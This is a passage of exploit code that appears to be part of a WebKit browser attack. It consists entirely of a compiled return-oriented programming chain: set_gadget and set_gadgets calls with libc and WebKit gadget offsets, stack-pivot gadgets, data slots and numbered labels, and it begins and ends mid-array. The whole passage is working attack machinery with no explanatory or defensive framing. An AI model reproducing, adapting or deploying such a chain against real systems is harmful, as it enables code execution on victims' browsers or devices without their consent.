[rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+71664, //L141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L141: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L142: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L144: db([65280, 0]); // 0xff00 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+71792, //L145 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L145: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760 
//pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L147: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L148: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+71976, //L150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L150: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+72032, //L151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L151: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+72144, //L153 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L153: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L155: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+72264, //L158 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+72248, //L156 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L156: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L158: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi 
ropchain+72440, //L161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+72456, //L162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+72408, //L159 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+72424, //L160 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L159: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L160: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L161: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L162: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+72552, //L164 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+72536, //L163 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L163: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L164: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L165: db([24, 0]); // 0x18 set_gadget(libc_base+763368,); //pop rcx //L166: db([24, 0]); // 0x18 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+72704, //L168 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L168: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+72760, //L169 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L169: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+72896, //L173 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+72880, //L172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L171: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L172: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L173: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+73016, //L174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+73048, //L176 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+73032, //L175 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L174: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L175: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L176: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+73152, //L177 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+73168, //L178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L177: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L178: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // 
-0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+73288, //L179 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+73272, //L180 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L180: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L179: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+73376, //L182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+73360, //L181 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L181: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L182: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+73480, //L183 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+73496, //L184 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L183: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L184: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+73616, //L185 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+73600, //L186 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L186: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L185: db([0, 0]); // 0x0 //___builtin_bswap64: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ 
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+73688, //L188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L188: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+73752, //L190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L190: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([16, 0]); // 0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+73832, //L191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L191: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L193: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+73904, //L194 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L194: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L196: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L197: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L199: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+74040, //L201 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L200: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L201: db([0, 0]); // 0x0 set_gadgets([ webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+74096, //L203 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop 
rcx ]); //L203: db([0, 0]); // 0x0 //L202: set_gadgets([ libc_base+764760, //pop rsi ropchain+74144, //L205 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L205: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L207: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+74264, //L210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+74248, //L208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L208: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L210: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+74440, //L213 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+74456, //L214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+74408, //L211 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+74424, //L212 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L211: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L212: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L213: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L214: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+74536, //L215 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+74552, //L216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L215: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L216: db([0, 
0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+74648, //L218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+74632, //L217 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L217: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L218: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+74728, //L219 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L219: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L220: db([4, 0]); // 0x4 set_gadget(libc_base+144605,); //pop rdi //L221: db([4, 0]); // 0x4 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+74872, //L222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+74904, //L224 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+74888, //L223 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L222: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L223: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L224: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+75080, //L226 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi 
ropchain+75096, //L227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+75064, //L225 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L225: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L226: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L227: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+75208, //L229 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+75256, //L232 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+75224, //L230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L229: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L230: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L231: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L232: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+75368, //L233+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+75360, //L233 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L233: db([0, 0]); // 0x0 set_gadgets([ ropchain+75384, //L233+24 ropchain+75400, //L228 libc_base+782311, //pop rsp ropchain+75416, //L234 //L228: libc_base+782311, //pop rsp ropchain+86016, //L235 //L234: libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L236: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L238: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+75552, //L241 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+75536, //L239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L239: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L241: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+75696, //L244 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+75664, //L242 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+75680, //L243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L242: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L243: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L244: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+75768, //L246 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L246: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+75824, //L247 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L247: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L249: db([7, 0]); // 0x7 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+75952, //L250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov 
rax, r8 libc_base+763368 //pop rcx ]); //L250: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L252: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+76072, //L255 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+76056, //L253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L253: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L255: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+76248, //L258 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+76264, //L259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+76216, //L256 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+76232, //L257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L256: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L257: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L258: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L259: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+76376, //L260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+76408, //L262 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+76392, //L261 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L260: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L261: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop 
rax //L262: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+76520, //L263 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+76536, //L264 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L263: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L264: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+76624, //L266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L266: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+76680, //L267 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L267: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+76824, //L270 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+76840, //L271 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+76808, //L269 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L269: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L270: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L271: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+77000, //L275 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+76968, //L273 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+76984, //L274 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L272: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L273: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L274: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L275: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+77056, //L277 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L277: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+77184, //L279 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+77200, //L280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+77168, //L278 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L278: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L279: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L280: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+77360, //L284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+77328, //L282 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+77344, //L283 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L281: db([24, 0]); // 0x18 
set_gadget(webkit_base+3236123,); //pop r9 //L282: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L283: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L284: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+77416, //L286 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L286: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+77544, //L288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+77560, //L289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+77528, //L287 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L287: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L288: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L289: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+77720, //L293 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+77688, //L291 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+77704, //L292 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L290: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L291: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L292: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L293: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+77776, //L295 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L295: db([0, 0]); // 0x0 set_gadgets([ 
